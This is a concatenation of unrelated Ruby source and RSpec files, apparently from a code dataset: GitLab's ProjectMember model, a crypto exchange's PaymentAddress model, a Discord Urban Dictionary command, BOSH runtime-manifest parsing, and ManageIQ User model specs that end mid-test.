validates_format_of :source_type, with: /\AProject\z/
default_scope { where(source_type: SOURCE_TYPE) }
scope :in_project, ->(project) { where(source_id: project.id) }
before_destroy :delete_member_todos
class << self
# Add users to project teams with passed access option
#
# access can be an integer representing a access code
# or symbol like :master representing role
#
# Ex.
# add_users_into_projects(
# project_ids,
# user_ids,
# ProjectMember::MASTER
# )
#
# add_users_into_projects(
# project_ids,
# user_ids,
# :master
# )
#
def add_users_into_projects(project_ids, user_ids, access, current_user = nil)
access_level = if roles_hash.has_key?(access)
roles_hash[access]
elsif roles_hash.values.include?(access.to_i)
access
else
raise "Non valid access"
end
users = user_ids.map { |user_id| Member.user_for_id(user_id) }
ProjectMember.transaction do
project_ids.each do |project_id|
project = Project.find(project_id)
users.each do |user|
Member.add_user(project.project_members, user, access_level, current_user)
end
end
end
true
rescue
false
end
def truncate_teams(project_ids)
ProjectMember.transaction do
members = ProjectMember.where(source_id: project_ids)
members.each do |member|
member.destroy
end
end
true
rescue
false
end
def truncate_team(project)
truncate_teams [project.id]
end
def roles_hash
Gitlab::Access.sym_options
end
def access_level_roles
Gitlab::Access.options
end
end
def access_field
access_level
end
def project
source
end
def owner?
project.owner == user
end
private
# before_destroy: drop the user's todos scoped to this project.
def delete_member_todos
  user.todos.where(project_id: source_id).destroy_all if user
end

# Notify the invitee; @raw_invite_token is presumably set by the base
# Member invite flow — TODO confirm against Member#send_invite.
def send_invite
  notification_service.invite_project_member(self, @raw_invite_token)
  super
end

# After creation: record a join event and notify, unless the member is
# the project owner (owners are not "added" in any meaningful sense).
def post_create_hook
  unless owner?
    event_service.join_project(self.project, self.user)
    notification_service.new_project_member(self)
  end
  super
end

# After update: only notify when the access level actually changed.
def post_update_hook
  if access_level_changed?
    notification_service.update_project_member(self)
  end
  super
end

# After destroy: record that the user left the project.
def post_destroy_hook
  event_service.leave_project(self.project, self.user)
  super
end

def after_accept_invite
  notification_service.accept_project_invite(self)
  super
end

def after_decline_invite
  notification_service.decline_project_invite(self)
  super
end

def event_service
  EventCreateService.new
end
end
| 20.588235 | 86 | 0.653016 |
260b5cf0ade12dad42f6f38f30e89afc36a1ecc5 | 3,245 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Gitlab::Config::Entry::Factory do
describe '#create!' do
before do
stub_const('Script', Class.new(Gitlab::Config::Entry::Node))
Script.class_eval do
include Gitlab::Config::Entry::Validatable
validations do
validates :config, array_of_strings: true
end
end
end
let(:entry) { Script }
let(:factory) { described_class.new(entry) }
context 'when setting a concrete value' do
it 'creates entry with valid value' do
entry = factory
.value(%w(ls pwd))
.create!
expect(entry.value).to eq %w(ls pwd)
end
context 'when setting description' do
before do
factory
.value(%w(ls pwd))
.with(description: 'test description')
end
it 'configures description' do
expect(factory.description).to eq 'test description'
end
it 'creates entry with description' do
entry = factory.create!
expect(entry.value).to eq %w(ls pwd)
expect(entry.description).to eq 'test description'
end
end
context 'when setting inherit' do
before do
factory
.value(%w(ls pwd))
.with(inherit: true)
end
it 'makes object inheritable' do
expect(factory.inheritable?).to eq true
end
end
context 'when setting key' do
it 'creates entry with custom key' do
entry = factory
.value(%w(ls pwd))
.with(key: 'test key')
.create!
expect(entry.key).to eq 'test key'
end
end
context 'when setting a parent' do
let(:object) { Object.new }
it 'creates entry with valid parent' do
entry = factory
.value('ls')
.with(parent: object)
.create!
expect(entry.parent).to eq object
end
end
end
context 'when not setting a value' do
it 'raises error' do
expect { factory.create! }.to raise_error(
Gitlab::Config::Entry::Factory::InvalidFactory
)
end
end
context 'when creating entry with nil value' do
it 'creates an unspecified entry' do
entry = factory
.value(nil)
.create!
expect(entry)
.not_to be_specified
end
end
context 'when passing metadata' do
let(:entry) { spy('entry') }
it 'passes metadata as a parameter' do
factory
.value('some value')
.metadata(some: 'hash')
.create!
expect(entry).to have_received(:new)
.with('some value', { some: 'hash' })
end
end
context 'when setting deprecation information' do
it 'passes deprecation as a parameter' do
entry = factory
.value('some value')
.with(deprecation: { deprecated: '10.0', warning: '10.1', removed: '11.0', documentation: 'docs' })
.create!
expect(entry.deprecation).to eq({ deprecated: '10.0', warning: '10.1', removed: '11.0', documentation: 'docs' })
end
end
end
end
| 24.770992 | 120 | 0.557165 |
1a0f61463db0542e7b8d82176127bd32b2a8e3a4 | 1,664 | class PaymentAddress < ActiveRecord::Base
# Mixes in currency helpers; `currency` / `currency_obj` below
# presumably come from Currencible — confirm in that module.
include Currencible

belongs_to :account
# Ask a background worker (via AMQP) for a deposit address right after
# the record is created.
after_commit :gen_address, on: :create
has_many :transactions, class_name: 'PaymentTransaction', foreign_key: 'address', primary_key: 'address'
validates_uniqueness_of :address, allow_nil: true

# Enqueues an async job that generates the coin deposit address; the
# worker is expected to fill in `address` later.
def gen_address
  payload = { payment_address_id: id, currency: currency }
  attrs = { persistent: true }
  AMQPQueue.enqueue(:deposit_coin_address, payload, attrs)
end

# Part after the first '|' in `address`. Assumes memo-based currencies
# store "address|memo" — TODO confirm. Returns nil when address is nil.
def memo
  address && address.split('|', 2).last
end

# Currency-wide shared deposit account when configured, otherwise this
# record's own generated address.
def deposit_address
  currency_obj[:deposit_account] || address
end

def as_json(options = {})
  {
    account_id: account_id,
    deposit_address: deposit_address
  }.merge(options)
end

# Pushes the freshly created address to the owner's private channel.
def trigger_deposit_address
  ::Pusher["private-#{account.member.sn}"].trigger_async('deposit_address', {type: 'create', attributes: as_json})
end

# Builds "<member_id><checksum>" where the checksum is the last three
# digits of the member's creation timestamp (epoch seconds).
def self.construct_memo(obj)
  member = obj.is_a?(Account) ? obj.member : obj
  checksum = member.created_at.to_i.to_s[-3..-1]
  "#{member.id}#{checksum}"
end

# Inverse of construct_memo: returns the Member when the embedded
# checksum matches, nil otherwise.
def self.destruct_memo(memo)
  member_id = memo[0...-3]
  checksum = memo[-3..-1]
  member = Member.find_by_id member_id
  return nil unless member
  return nil unless member.created_at.to_i.to_s[-3..-1] == checksum
  member
end

# NOTE(review): overrides to_json to return a Hash (not a JSON string);
# callers appear to rely on this shape — do not "fix" without checking.
def to_json
  {address: deposit_address}
end
end
# == Schema Information
# Schema version: 20180215144645
#
# Table name: payment_addresses
#
# id :integer not null, primary key
# account_id :integer
# address :string(255)
# created_at :datetime
# updated_at :datetime
# currency :integer
# secret :string(255)
#
| 23.43662 | 116 | 0.686899 |
bf7f9f5db7b67553eb349937e349c8a9c70ac4d4 | 122 | require 'rails_helper'
RSpec.describe TopicNotification, type: :model do
  # shoulda-matchers one-liner: a notification requires an associated topic.
  it { is_expected.to validate_presence_of :topic }
end
| 20.333333 | 49 | 0.786885 |
6ad52dfd8ff56da52a9df6dbfc897ad692570c61 | 279 | class CreateCourses < ActiveRecord::Migration
# Creates the courses table: a course is identified by grade/section/code
# strings and belongs to an academic year.
def self.up
  create_table :courses do |t|
    t.string :grade
    t.string :section
    t.string :code
    t.references :academic_year
    t.timestamps
  end
end

# Rolls the migration back by dropping the table again.
def self.down
  drop_table :courses
end
end
| 16.411765 | 45 | 0.65233 |
3853da35b8816e8c9500fefb45538fff39171638 | 629 | # frozen_string_literal: true
require "rails_helper"
module WasteExemptionsEngine
  RSpec.describe RenewingRegistration, type: :model do
    describe "#workflow_state" do
      # Shared examples assert the workflow transition out of each
      # postcode form for a renewal's site address.
      it_behaves_like "a postcode transition",
                      previous_state: :site_grid_reference_form,
                      address_type: "site",
                      factory: :renewing_registration

      it_behaves_like "a postcode transition",
                      previous_state: :is_a_farmer_form,
                      address_type: "site",
                      factory: :renewing_registration_with_manual_site_address
    end
  end
end
| 31.45 | 78 | 0.631161 |
e87184480d259d3761032b21d4323e3652e02646 | 292 | {
'info' => {
'api_server' => '',
'api_username' => '',
'api_password' => '',
'space_slug' => '',
'enable_debug_logging' => 'true'
},
'parameters' => {
'error_handling' => 'Error Message',
'space_slug' => '',
'team_name' => 'Testing',
}
}
| 19.466667 | 41 | 0.458904 |
1c33d6b04278ed9ccf352da88445debc0e4f6556 | 1,666 | module Bot
module DiscordCommands
# Urban Dictionary
module Urban
extend Discordrb::Commands::CommandContainer
# Monkey-patches the gem's UrbanDictionary::Definition with helpers that
# report whether a field exceeds Discord's 1024-character embed-field
# limit. NOTE(review): reopening a third-party class — a refinement
# would scope this more safely.
class UrbanDictionary::Definition
  # True when the definition text will not fit in one embed field.
  def long_text?
    text.length > 1024
  end

  # True when the example text will not fit in one embed field.
  def long_example?
    example.length > 1024
  end
end
# `urban <word>` / `ud <word>` — look a term up on Urban Dictionary and
# reply with an embed. With no argument a random definition is shown.
command([:ud, :urban],
        description: 'look up a word on Urban Dictionary',
        usage: "#{BOT.prefix}urban (word)") do |event, *term|
  term = term.join(' ')
  word = UrbanDictionary.random.first if term.empty?
  word ||= UrbanDictionary.define(term).first
  next "Couldn't find anything for `#{term}` 😕" unless word
  # Suffix appended when the definition must be truncated to fit the
  # 1024-character embed-field limit.
  url = "... [(Read More)](#{word.url})"
  # Strip markdown asterisks from the example text.
  # NOTE(review): delete! runs before the `if word.example` check below,
  # so this raises if example is ever nil — confirm the gem's contract.
  word.example.delete!('*')
  event.channel.send_embed do |e|
    e.add_field name: 'Definition', value: word.long_text? ? truncate(word.text, url) : word.text, inline: false
    if word.example
      e.add_field name: 'Example', value: word.long_example? ? truncate(word.example, '...') : word.example, inline: false
    end
    # Zero-width-space name renders a blank field title for the vote row.
    e.add_field name: "\u200B", value: "⬆️ `#{word.thumbs_up}` ⬇️ `#{word.thumbs_down}`", inline: false
    e.author = {
      icon_url: 'http://www.dimensionalbranding.com/userfiles/urban_dictionary.jpg',
      name: word.word,
      url: word.url
    }
    e.footer = { text: "Author: #{word.author}" }
    e.color = 5800090
  end
end
module_function
# Cuts +text+ down so that text plus +append+ fits within Discord's
# 1024-character embed-field limit, then tacks +append+ onto the end.
def truncate(text, append = '')
  limit = 1024 - append.length
  text.slice(0, limit).strip + append
end
end
end
end
| 32.038462 | 128 | 0.567827 |
ab776f909854ff65fa05ceaa8372730d8f9f7e5b | 1,033 | module CircuitSwitch
class Configuration
  CIRCUIT_SWITCH = 'circuit_switch'.freeze

  attr_accessor :reporter, :due_date_notifier
  attr_writer :report_paths, :report_if, :due_date, :with_backtrace, :allowed_backtrace_paths, :strip_paths

  # Paths scanned for circuit-switch call sites; defaults to the Rails root.
  def report_paths
    @report_paths ||= [Rails.root]
  end

  # Always keeps the gem's own path in the silence list.
  def silent_paths=(paths)
    @silent_paths = paths.append(CIRCUIT_SWITCH).uniq
  end

  def silent_paths
    @silent_paths ||= [CIRCUIT_SWITCH]
  end

  # Whether reporting is enabled; defaults to "only in production".
  # BUGFIX: the previous `@report_if ||= Rails.env.production?` threw
  # away an explicitly assigned `false` (falsy values re-trigger ||=),
  # silently re-enabling reporting in production. An explicit nil check
  # lets `config.report_if = false` stick.
  def report_if
    @report_if = Rails.env.production? if @report_if.nil?
    @report_if
  end

  # Evaluates report_if, calling it when it is a callable (proc/lambda).
  def enable_report?
    condition = report_if
    condition.respond_to?(:call) ? condition.call : !!condition
  end

  # Renames the `key` attribute on the backing model.
  def key_column_name=(key)
    ::CircuitSwitch::CircuitSwitch.alias_attribute :key, key
  end

  # Default deadline for a switch: ten days from today.
  def due_date
    @due_date ||= Date.today + 10
  end

  # Same nil-check rationale as #report_if: `false` is a valid value
  # and must not be re-assigned on every read.
  def with_backtrace
    @with_backtrace = false if @with_backtrace.nil?
    @with_backtrace
  end

  def allowed_backtrace_paths
    @allowed_backtrace_paths ||= [Dir.pwd]
  end

  def strip_paths
    @strip_paths ||= [Dir.pwd]
  end
end
end
| 21.081633 | 109 | 0.668925 |
d5cce6308bf55b2ad4601aa4a7d33d5ccb9b1d27 | 5,595 | module Bosh::Director
module DeploymentPlan
class RuntimeManifestParser
include ValidationHelper
# @param logger  presumably a logger; stored but unused in the visible code
# @param deployment [DeploymentPlan::Planner, nil] deployment to bind
#   releases/addons against; nil means validate-only parsing
def initialize(logger, deployment=nil)
  @deployment = deployment
  @logger = logger
end

# Parses a runtime-config manifest hash. Releases are parsed first so
# that addon jobs can be validated against the declared releases.
def parse(runtime_manifest)
  parse_releases(runtime_manifest)
  parse_addons(runtime_manifest)
end
private
# Collects release specs from either the singular 'release' key or the
# plural 'releases' array (declaring both is an error), validates each
# spec, and — when a deployment is present — binds each release into
# the deployment plan.
def parse_releases(runtime_manifest)
  @release_specs = []
  if runtime_manifest['release']
    if runtime_manifest['releases']
      raise RuntimeAmbiguousReleaseSpec,
            "Runtime manifest contains both 'release' and 'releases' " +
            'sections, please use one of the two.'
    end
    @release_specs << runtime_manifest['release']
  else
    safe_property(runtime_manifest, 'releases', :class => Array).each do |release|
      @release_specs << release
    end
  end
  @release_specs.each do |release_spec|
    # 'latest' is ambiguous for a runtime config, so it is rejected.
    if release_spec['version'] == 'latest'
      raise RuntimeInvalidReleaseVersion,
            "Runtime manifest contains the release '#{release_spec['name']}' with version as 'latest'. " +
            "Please specify the actual version string."
    end
    if @deployment
      deployment_release = @deployment.release(release_spec["name"])
      if deployment_release
        # A release the deployment already pins must match exactly;
        # when it matches there is nothing more to bind.
        if deployment_release.version != release_spec["version"].to_s
          raise RuntimeInvalidDeploymentRelease, "Runtime manifest specifies release '#{release_spec["name"]}' with version as '#{release_spec["version"]}'. " +
                "This conflicts with version '#{deployment_release.version}' specified in the deployment manifest."
        else
          next
        end
      end
      release_version = DeploymentPlan::ReleaseVersion.new(@deployment.model, release_spec)
      release_version.bind_model
      @deployment.add_release(release_version)
    end
  end
end
# Validates each addon job against the declared releases and, when a
# deployment is present, builds a DeploymentPlan::Template per addon
# job (wiring its release-declared and manifest-declared links) and
# merges the accumulated templates into every deployment job.
def parse_addons(runtime_manifest)
  addons = safe_property(runtime_manifest, 'addons', :class => Array, :default => [])
  addons.each do |addon_spec|
    deployment_plan_templates = []
    addon_jobs = safe_property(addon_spec, 'jobs', :class => Array, :default => [])
    addon_jobs.each do |addon_job|
      # Every addon job must come from a release listed in this manifest.
      if !@release_specs.find { |release_spec| release_spec['name'] == addon_job['release'] }
        raise RuntimeReleaseNotListedInReleases,
              "Runtime manifest specifies job '#{addon_job['name']}' which is defined in '#{addon_job['release']}', but '#{addon_job['release']}' is not listed in the releases section."
      end
      if @deployment
        valid_release_versions = @deployment.releases.map {|r| r.name }
        deployment_release_ids = Models::Release.where(:name => valid_release_versions).map {|r| r.id}
        deployment_jobs = @deployment.jobs
        templates_from_model = Models::Template.where(:name => addon_job['name'], :release_id => deployment_release_ids)
        # NOTE(review): a dataset/relation from .where is typically never
        # nil — this check looks dead; an emptiness check may have been
        # intended. Confirm before changing.
        if templates_from_model == nil
          raise "Job '#{addon_job['name']}' not found in Template table"
        end
        release = @deployment.release(addon_job['release'])
        release.bind_model
        template = DeploymentPlan::Template.new(release, addon_job['name'])
        deployment_jobs.each do |j|
          # Links declared by the release's job templates.
          templates_from_model.each do |template_from_model|
            if template_from_model.consumes != nil
              template_from_model.consumes.each do |consumes|
                template.add_link_from_release(j.name, 'consumes', consumes["name"], consumes)
              end
            end
            if template_from_model.provides != nil
              template_from_model.provides.each do |provides|
                template.add_link_from_release(j.name, 'provides', provides["name"], provides)
              end
            end
          end
          # Links declared directly in the addon job's manifest entry.
          provides_links = safe_property(addon_job, 'provides', class: Hash, optional: true)
          provides_links.to_a.each do |link_name, source|
            template.add_link_from_manifest(j.name, "provides", link_name, source)
          end
          consumes_links = safe_property(addon_job, 'consumes', class: Hash, optional: true)
          consumes_links.to_a.each do |link_name, source|
            template.add_link_from_manifest(j.name, 'consumes', link_name, source)
          end
          if addon_job.has_key?('properties')
            template.add_template_scoped_properties(addon_job['properties'], j.name)
          end
        end
        template.bind_models
        deployment_plan_templates.push(template)
        # NOTE(review): this merge runs once per addon job, re-passing the
        # whole accumulated template list each time — confirm merge_addon
        # tolerates repeated concatenation.
        deployment_jobs.each do |job|
          merge_addon(job, deployment_plan_templates, addon_spec['properties'])
        end
      end
    end
  end
end
# Folds addon templates (and optional addon-level properties) into a
# deployment job. Existing collections are mutated in place; when the
# job has none yet it adopts the given objects directly, preserving the
# original aliasing behaviour.
def merge_addon(job, templates, properties)
  existing_templates = job.templates
  if existing_templates
    existing_templates.concat(templates)
  else
    job.templates = templates
  end
  return unless properties
  existing_properties = job.all_properties
  if existing_properties
    existing_properties.merge!(properties)
  else
    job.all_properties = properties
  end
end
end
end
end
| 38.061224 | 191 | 0.586774 |
d500c4717a4410119f9e9cd417778abdd593923d | 18,639 | describe User do
context "validations" do
it "should ensure presence of name" do
expect(FactoryGirl.build(:user, :name => nil)).not_to be_valid
end
it "should ensure presence of user id" do
expect(FactoryGirl.build(:user, :userid => nil)).not_to be_valid
end
it "should invalidate incorrect email address" do
expect(FactoryGirl.build(:user, :email => "thisguy@@manageiq.com")).not_to be_valid
end
it "should validate email address with a value of nil" do
expect(FactoryGirl.build(:user, :email => nil)).to be_valid
end
it "should save proper email address" do
expect(FactoryGirl.build(:user, :email => "[email protected]")).to be_valid
end
end
describe "#change_password" do
let(:user) { FactoryGirl.create(:user, :password => "smartvm") }
it "should change user password" do
password = user.password
newpassword = "newpassword"
user.change_password(password, newpassword)
expect(user.password).to eq(newpassword)
end
it "should raise an error when asked to change user password" do
password = "wrongpwd"
newpassword = "newpassword"
expect { user.change_password(password, newpassword) }
.to raise_error(MiqException::MiqEVMLoginError)
end
end
context "filter methods" do
let(:user) { FactoryGirl.create(:user, :miq_groups => [miq_group]) }
let(:mfilters) { {"managed" => "m"} }
let(:bfilters) { {"belongsto" => "b"} }
let(:miq_group) { FactoryGirl.create(:miq_group, :entitlement => entitlement) }
let(:entitlement) do
entitlement = FactoryGirl.create(:entitlement)
entitlement.set_managed_filters(mfilters)
entitlement.set_belongsto_filters(bfilters)
entitlement.save!
entitlement
end
it "should check for and get Managed and Belongs-to filters from the group" do
expect(user.has_filters?).to be_truthy
expect(user.get_managed_filters).to eq(mfilters)
expect(user.get_belongsto_filters).to eq(bfilters)
end
end
context "timezone methods" do
let!(:miq_server) { EvmSpecHelper.local_miq_server }
let(:user) { FactoryGirl.create(:user) }
describe "#get_timezone" do
it "gets Server time zone setting" do
expect(user.get_timezone).to eq("UTC")
end
end
describe "#with_my_timezone" do
it "sets the user's zone in a block" do
user.settings.store_path(:display, :timezone, "Hawaii")
user.with_my_timezone do
expect(Time.zone.to_s).to eq("(GMT-10:00) Hawaii")
end
expect(Time.zone.to_s).to eq("(GMT+00:00) UTC")
end
end
end
describe ".missing_user_features" do
it "user with group and role returns nil" do
user = FactoryGirl.create(:user_admin)
expect(User.missing_user_features(user)).to be_nil
end
it "no user returns 'User'" do
expect(User.missing_user_features(nil)).to eq "User"
end
it "missing group returns 'Group'" do
user = FactoryGirl.create(:user)
expect(User.missing_user_features(user)).to eq "Group"
end
it "missing role returns 'Role'" do
user = FactoryGirl.create(:user_with_group)
expect(User.missing_user_features(user)).to eq "Role"
end
end
describe "role methods" do
let(:user) do
FactoryGirl.create(:user,
:settings => {"Setting1" => 1, "Setting2" => 2, "Setting3" => 3},
:role => role_name)
end
describe "#self_service?" do
let(:role_name) { "user_self_service" }
it "checks Self Service roles" do
expect(user.self_service?).to be_truthy
expect(user.super_admin_user?).to be_falsey
user.current_group = nil
expect(user.self_service?).to be_falsey
end
end
describe "#limited_self_service?" do
let(:role_name) { "user_limited_self_service" }
it "checks Self Service roles" do
expect(user.limited_self_service?).to be_truthy
expect(user.super_admin_user?).to be_falsey
user.current_group = nil
expect(user.limited_self_service?).to be_falsey
end
end
describe "#super_admin_user?" do
let(:role_name) { "super_administrator" }
it "checks Super Admin roles" do
expect(user.super_admin_user?).to be_truthy
user.current_group = nil
expect(user.super_admin_user?).to be_falsey
end
end
describe "#admin_user?" do
let(:role_name) { "administrator" }
it "should check Admin Roles" do
expect(user.admin_user?).to be_truthy
expect(user.super_admin_user?).to be_falsey
user.current_group = nil
expect(user.admin_user?).to be_falsey
end
end
end
context "#authorize_ldap" do
before(:each) do
@fq_user = "[email protected]"
@task = MiqTask.create(:name => "LDAP User Authorization of '#{@fq_user}'", :userid => @fq_user)
@auth_config =
{:authentication => {:ldapport => "389",
:basedn => "dc=manageiq,dc=com",
:follow_referrals => false,
:get_direct_groups => true,
:bind_dn => "[email protected]",
:mode => "ldap", :user_proxies => [{}],
:user_type => "userprincipalname",
:bind_pwd => "blah",
:ldap_role => true,
:user_suffix => "manageiq.com",
:group_memberships_max_depth => 2,
:ldaphost => ["192.168.254.15"]}
}
stub_server_configuration(@auth_config)
@miq_ldap = double('miq_ldap')
allow(@miq_ldap).to receive_messages(:bind => false)
end
it "will fail task if user object not found in ldap" do
allow(@miq_ldap).to receive_messages(:get_user_object => nil)
expect(AuditEvent).to receive(:failure).once
authenticate = Authenticator::Ldap.new(@auth_config[:authentication])
allow(authenticate).to receive_messages(:ldap => @miq_ldap)
expect(authenticate.authorize(@task.id, @fq_user)).to be_nil
@task.reload
expect(@task.state).to eq("Finished")
expect(@task.status).to eq("Error")
expect(@task.message).to match(/unable to find user object/)
end
it "will fail task if user group doesn't match an EVM role" do
allow(@miq_ldap).to receive_messages(:get_user_object => "user object")
allow(@miq_ldap).to receive_messages(:get_attr => nil)
allow(@miq_ldap).to receive_messages(:normalize => "a-username")
authenticate = Authenticator::Ldap.new(@auth_config[:authentication])
allow(authenticate).to receive_messages(:ldap => @miq_ldap)
allow(authenticate).to receive_messages(:groups_for => [])
expect(AuditEvent).to receive(:failure).once
expect(authenticate.authorize(@task.id, @fq_user)).to be_nil
@task.reload
expect(@task.state).to eq("Finished")
expect(@task.status).to eq("Error")
expect(@task.message).to match(/unable to match user's group membership/)
end
end
context "group assignment" do
before(:each) do
@group1 = FactoryGirl.create(:miq_group, :description => "EvmGroup 1")
@group2 = FactoryGirl.create(:miq_group, :description => "EvmGroup 2")
@group3 = FactoryGirl.create(:miq_group, :description => "EvmGroup 3")
end
describe "#miq_groups=" do
before(:each) do
@user = FactoryGirl.create(:user, :miq_groups => [@group3])
end
it "sets miq_groups" do
expect(@user.miq_groups).to match_array [@group3]
end
it "sets current_group" do
expect(@user.current_group).to eq(@group3)
end
it "when including current group" do
@user.miq_groups = [@group1, @group2, @group3]
expect(@user.valid?).to be_truthy
expect(@user.current_group).to eq(@group3)
end
it "when not including currrent group" do
@user.miq_groups = [@group1, @group2]
expect(@user.valid?).to be_truthy
expect(@user.current_group).to eq(@group1)
end
it "when nil" do
expect { @user.miq_groups = nil }.to raise_error(NoMethodError)
end
end
describe "#current_group=" do
before(:each) do
@user = FactoryGirl.create(:user, :miq_groups => [@group1, @group2])
end
it "sets current_group" do
expect(@user.current_group).to eq(@group1)
end
it "when belongs to miq_groups" do
expect(@user.valid?).to be_truthy
end
it "when not belongs to miq_groups" do
@user.miq_groups = [@group2, @group3]
expect(@user.current_group).to eq(@group2)
end
it "when nil" do
@user.current_group = nil
expect(@user.valid?).to be_truthy
end
end
end
context "Testing active VM aggregation" do
before :each do
@ram_size = 1024
@disk_size = 1_000_000
@num_cpu = 2
group = FactoryGirl.create(:miq_group)
@user = FactoryGirl.create(:user, :miq_groups => [group])
@ems = FactoryGirl.create(:ems_vmware, :name => "test_vcenter")
@storage = FactoryGirl.create(:storage, :name => "test_storage_nfs", :store_type => "NFS")
@hw1 = FactoryGirl.create(:hardware, :cpu_total_cores => @num_cpu, :memory_mb => @ram_size)
@hw2 = FactoryGirl.create(:hardware, :cpu_total_cores => @num_cpu, :memory_mb => @ram_size)
@hw3 = FactoryGirl.create(:hardware, :cpu_total_cores => @num_cpu, :memory_mb => @ram_size)
@hw4 = FactoryGirl.create(:hardware, :cpu_total_cores => @num_cpu, :memory_mb => @ram_size)
@disk1 = FactoryGirl.create(:disk, :device_type => "disk", :size => @disk_size, :hardware_id => @hw1.id)
@disk2 = FactoryGirl.create(:disk, :device_type => "disk", :size => @disk_size, :hardware_id => @hw2.id)
@disk3 = FactoryGirl.create(:disk, :device_type => "disk", :size => @disk_size, :hardware_id => @hw3.id)
@disk4 = FactoryGirl.create(:disk, :device_type => "disk", :size => @disk_size, :hardware_id => @hw4.id)
@active_vm = FactoryGirl.create(:vm_vmware,
:name => "Active VM",
:evm_owner_id => @user.id,
:ems_id => @ems.id,
:storage_id => @storage.id,
:hardware => @hw1)
@archived_vm = FactoryGirl.create(:vm_vmware,
:name => "Archived VM",
:evm_owner_id => @user.id,
:hardware => @hw2)
@orphaned_vm = FactoryGirl.create(:vm_vmware,
:name => "Orphaned VM",
:evm_owner_id => @user.id,
:storage_id => @storage.id,
:hardware => @hw3)
@retired_vm = FactoryGirl.create(:vm_vmware,
:name => "Retired VM",
:evm_owner_id => @user.id,
:retired => true,
:hardware => @hw4)
end
it "#active_vms" do
expect(@user.active_vms).to match_array([@active_vm])
end
it "#allocated_memory" do
expect(@user.allocated_memory).to eq(@ram_size.megabyte)
end
it "#allocated_vcpu" do
expect(@user.allocated_vcpu).to eq(@num_cpu)
end
it "#allocated_storage" do
expect(@user.allocated_storage).to eq(@disk_size)
end
it "#provisioned_storage" do
expect(@user.provisioned_storage).to eq(@ram_size.megabyte + @disk_size)
end
%w(allocated_memory allocated_vcpu allocated_storage provisioned_storage).each do |vcol|
it "should have virtual column #{vcol} " do
expect(described_class).to have_virtual_column vcol.to_s, :integer
end
end
end
context ".authenticate_with_http_basic" do
let(:user) { FactoryGirl.create(:user, :password => "dummy") }
it "should login with good username/password" do
expect(User.authenticate_with_http_basic(user.userid, user.password)).to eq([true, user.userid])
end
it "should fail with bad username" do
bad_userid = "bad_userid"
expect(User.authenticate_with_http_basic(bad_userid, user.password)).to eq([false, bad_userid])
end
it "should fail with bad password" do
expect(User.authenticate_with_http_basic(user.userid, "bad_pwd")).to eq([false, user.userid])
end
end
context ".seed" do
include_examples(".seed called multiple times", 1)
include_examples("seeding users with", [])
include_examples("seeding users with", [MiqUserRole, MiqGroup])
end
context "#accessible_vms" do
before do
@user = FactoryGirl.create(:user_admin)
@self_service_role = FactoryGirl.create(
:miq_user_role,
:name => "ss_role",
:settings => {:restrictions => {:vms => :user_or_group}}
)
@self_service_group = FactoryGirl.create(:miq_group, :miq_user_role => @self_service_role)
@limited_self_service_role = FactoryGirl.create(
:miq_user_role,
:name => "lss_role",
:settings => {:restrictions => {:vms => :user}}
)
@limited_self_service_group = FactoryGirl.create(:miq_group, :miq_user_role => @limited_self_service_role)
@vm = []
(1..5).each { |i| @vm[i] = FactoryGirl.create(:vm_redhat, :name => "vm_#{i}") }
end
subject(:accessible_vms) { @user.accessible_vms }
it "non self service user" do
expect(accessible_vms.size).to eq(5)
end
it "self service user" do
@user.update_attributes(:miq_groups => [@self_service_group])
@vm[1].update_attributes(:evm_owner => @user)
@vm[2].update_attributes(:miq_group => @self_service_group)
expect(accessible_vms.size).to eq(2)
end
it "limited self service user" do
@user.update_attributes(:miq_groups => [@limited_self_service_group])
@vm[1].update_attributes(:evm_owner => @user)
@vm[2].update_attributes(:miq_group => @self_service_group)
@vm[3].update_attributes(:miq_group => @limited_self_service_group)
expect(accessible_vms.size).to eq(1)
end
end
describe "#current_group_by_description=" do
subject { FactoryGirl.create(:user, :miq_groups => [g1, g2], :current_group => g1) }
let(:g1) { FactoryGirl.create(:miq_group) }
let(:g2) { FactoryGirl.create(:miq_group) }
it "ignores blank" do
subject.current_group_by_description = ""
expect(subject.current_group).to eq(g1)
expect(subject.miq_group_description).to eq(g1.description)
end
it "ignores not found" do
subject.current_group_by_description = "not_found"
expect(subject.current_group).to eq(g1)
expect(subject.miq_group_description).to eq(g1.description)
end
it "ignores a group that you do not belong" do
subject.current_group_by_description = FactoryGirl.create(:miq_group).description
expect(subject.current_group).to eq(g1)
expect(subject.miq_group_description).to eq(g1.description)
end
it "sets by description" do
subject.current_group_by_description = g2.description
expect(subject.current_group).to eq(g2)
expect(subject.miq_group_description).to eq(g2.description)
end
context "as a super admin" do
subject { FactoryGirl.create(:user, :role => "super_administrator") }
it "sets any group, regardless of group membership" do
expect(subject).to be_super_admin_user
subject.current_group_by_description = g2.description
expect(subject.current_group).to eq(g2)
end
end
end
describe ".find_by_lower_email" do
it "uses cache" do
u = FactoryGirl.build(:user_with_email)
expect(User.find_by_lower_email(u.email.upcase, u)).to eq(u)
end
it "finds in the table" do
u = FactoryGirl.create(:user_with_email)
expect(User.find_by_lower_email(u.email.upcase)).to eq(u)
end
end
describe "#current_tenant" do
let(:user1) { FactoryGirl.create(:user_with_group) }
it "sets the tenant" do
User.with_user(user1) do
expect(User.current_tenant).to be_truthy
expect(User.current_tenant).to eq(user1.current_tenant)
end
end
end
describe "#current_user=" do
let(:user1) { FactoryGirl.create(:user) }
it "sets the user" do
User.current_user = user1
expect(User.current_userid).to eq(user1.userid)
expect(User.current_user).to eq(user1)
end
end
describe "#with_user" do
let(:user1) { FactoryGirl.create(:user) }
let(:user2) { FactoryGirl.create(:user) }
it "sets the user" do
User.with_user(user1) do
expect(User.current_userid).to eq(user1.userid)
expect(User.current_user).to eq(user1)
User.with_user(user2) do
expect(User.current_userid).to eq(user2.userid)
expect(User.current_user).to eq(user2)
end
expect(User.current_userid).to eq(user1.userid)
expect(User.current_user).to eq(user1)
end
end
# sorry. please help me delete this use case / parameter
it "supports a userid with a nil user" do
User.with_user(user1) do
User.with_user(nil, "oleg") do
expect(User.current_userid).to eq("oleg")
expect(User.current_user).not_to be
end
expect(User.current_userid).to eq(user1.userid)
expect(User.current_user).to eq(user1)
end
end
end
context ".super_admin" do
it "has super_admin" do
FactoryGirl.create(:miq_group, :role => "super_administrator")
User.seed
expect(User.super_admin).to be_super_admin_user
end
end
context ".admin?" do
it "admin? succeeds with admin account" do
expect(User.admin?("admin")).to be_truthy
end
it "admin? fails with non-admin account" do
expect(User.admin?("regular_user")).to be_falsey
end
end
context ".authorize_user" do
it "returns nil with blank userid" do
